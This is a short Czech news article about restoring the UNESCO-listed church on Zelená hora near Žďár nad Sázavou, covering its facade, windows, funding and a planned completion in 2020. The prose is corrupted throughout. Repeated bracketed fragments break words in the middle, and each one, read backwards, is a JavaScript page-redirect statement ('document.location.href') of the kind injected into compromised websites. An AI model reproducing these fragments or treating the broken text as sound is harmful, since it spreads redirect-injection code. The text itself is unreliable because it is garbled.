Rainbow page separator

Na Vánoce už bude památka UNESCO na Zelené hoře bez lešení

Pondělí, 12. listopadu 2018

Žďár nad Sázavou / Ještě nasadit zrestaurovaná okna a prozatím bude ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo. Lešení, které již půl roku s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí kolem východní části kostela svatého Jana Nepomuckého na Zelené hoře – památky UNESCO, má do Vánoc zmizet. Stávající opravy zahrnuly také obnovu fasády a rekonstrukci dveří.
Celková obnova památky však potrvá až do roku 2020, „zámecké“ římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolické farnosti se na opravy podařilo získat 42,7 milionu korun prostřednictvím evropské dotace. Výsledkem má být obnova původního stavebně-technického stavu i architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické podoby objektu, který představuje jedno z vrcholných děl významného architekta Jana Blažeje Santiniho-Aichela. Týkat se bude nejenom exteriéru, ale i interiéru sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánku, což zahrnuje zrestaurování omítek, doplnění původní plastické výzdoby, obnovu mobiliáře a zrestaurování podlahy kostela. Dojde i na úpravy poutní loučky v areálu, odkud byly le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos vymístěny poslední hroby.